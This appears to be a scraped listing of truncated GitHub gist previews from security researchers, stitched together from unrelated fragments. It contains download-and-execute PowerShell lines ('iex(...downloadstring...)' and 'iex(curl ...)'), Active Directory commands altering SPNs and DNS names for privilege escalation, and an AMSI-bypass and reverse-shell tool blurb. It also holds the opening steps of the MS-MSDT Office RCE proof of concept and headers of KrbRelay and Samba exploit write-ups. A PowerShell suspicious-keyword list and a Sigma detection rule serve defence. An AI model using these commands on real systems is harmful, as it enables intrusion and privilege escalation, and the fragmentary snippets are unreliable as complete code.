LuemmelSec

# To use the function, call it like this:
# iex(new-object net.webclient).downloadstring("https://gist.githubusercontent.com/LuemmelSec/208b8ba52b645ec189031d2b5200f76e/raw/c6c1008da1b5670d3fb549578968c2a2f086a00b/Get-SPVersionInfo.ps1")
# Get-SPVersionInfo -ServerUrl "https://my-sharepointserver"
function Get-SPVersionInfo {
    param (
        [string]$ServerUrl,
        [switch]$SkipCertificateCheck,   # Flag to skip certificate checks
        [switch]$SkipHttpErrorCheck      # Flag to skip HTTP error handling
    )

nasbench

# Source: System.Management.Automation.dll
# This list is used to determin if a ScriptBlock contains potential suspicious content
# If a match is found an automatic 4104 with a "warning" level is generated.
# https://github.com/PowerShell/PowerShell/blob/master/src/System.Management.Automation/engine/runtime/CompiledScriptBlock.cs
- "Add-Type"
- "AddSecurityPackage"
- "AdjustTokenPrivileges"
- "AllocHGlobal"
- "BindingFlags"
- "Bypass"

z0rs

Red Teaming tool

• General usefull Powershell Scripts
• AMSI Bypass restriction Bypass
• Payload Hosting
• Network Share Scanner
• Lateral Movement
• Reverse Shellz
• POST Exploitation

rad9800

#include <Windows.h>
#include <winternl.h>

#pragma comment(linker, "/ENTRY:entry")

// Define hashing algorithm to use
#define HASHALGO HashStringDjb2
// Define how large you'd like cache to be 
#define CACHE 50

tothi

MS-MSDT 0-day Office RCE

MS Office docx files may contain external OLE Object references as HTML files. There is an HTML sceme "ms-msdt:" which invokes the msdt diagnostic tool, what is capable of executing arbitrary code (specified in parameters).

The result is a terrifying attack vector for getting RCE through opening malicious docx files (without using macros).

Here are the steps to build a Proof-of-Concept docx:

1. Open Word (used up-to-date 2019 Pro, 16.0.10386.20017), create a dummy document, insert an (OLE) object (as a Bitmap Image), save it in docx.

kevthehermit

title: Sysmon Office MSDT
id: c95ed569-5da4-48b3-9698-5e429964556c
description: Detects MSDT Exploit Attempts
status: experimental
author: kevthehermit
date: 2022/05/30
references:
    - https://docs.microsoft.com/en-us/sysinternals/downloads/sysmon
    - https://gist.github.com/kevthehermit/5c8d52af388989cfa0ea38feace977f2
logsource:

freefirex

{
		"SliverExtension" :{
			"prefix": "sliverext",
			"body": [ "{",
					"\"name\": \"$1\",",
					"\"version\": \"0.0.0\",",
					"\"command_name\": \"$2\",",
					"\"extension_author\": \"$3\",",
					"\"original_author\": \"$3\",",
					"\"repo_url\": \"N/A\",",

Wh04m1001

iex(curl https://raw.githubusercontent.com/samratashok/ADModule/master/Import-ActiveDirectory.ps1 -UseBasicParsing )

Import-ActiveDirectory
Set-ADComputer WIN-JQTB1UHHF2S -ServicePrincipalNames @{REPLACE="HOST/WIN-JQTB1UHHF2S","RestrictedKrbHost/WIN-JQTB1UHHF2S"} -Verbose

#in my testing i had to set dnshostname to $null first

Set-ADComputer WIN-JQTB1UHHF2S -DNSHostName $null

Set-ADComputer WIN-JQTB1UHHF2S -DNSHostName dc1.batcave.local

tothi

KrbRelay with RBCD Privilege Escalation HOWTO

Short HOWTO about one use case of the work from Cube0x0 (KrbRelay) and others.

TL;DR

No-Fix Local Privilege Escalation from low-priviliged domain user to local system on domain-joined computers.

Prerequisites:

• LDAP signing not required on Domain Controller (default!)

0xsha

# CVE-2021-44142 PoC Samba 4.15.0 OOB Read/Write 
# (C) 2022 - 0xSha.io -  @0xSha
# This PoC is un-weaponized and for educational purposes only .
# To learn how to use the PoC please read the writeup : 
# https://0xsha.io/blog/a-samba-horror-story-cve-2021-44142
# requires samba4-python

# Refrences : 
# https://www.thezdi.com/blog/2022/2/1/cve-2021-44142-details-on-a-samba-code-execution-bug-demonstrated-at-pwn2own-austin
# Patch : https://attachments.samba.org/attachment.cgi?id=17092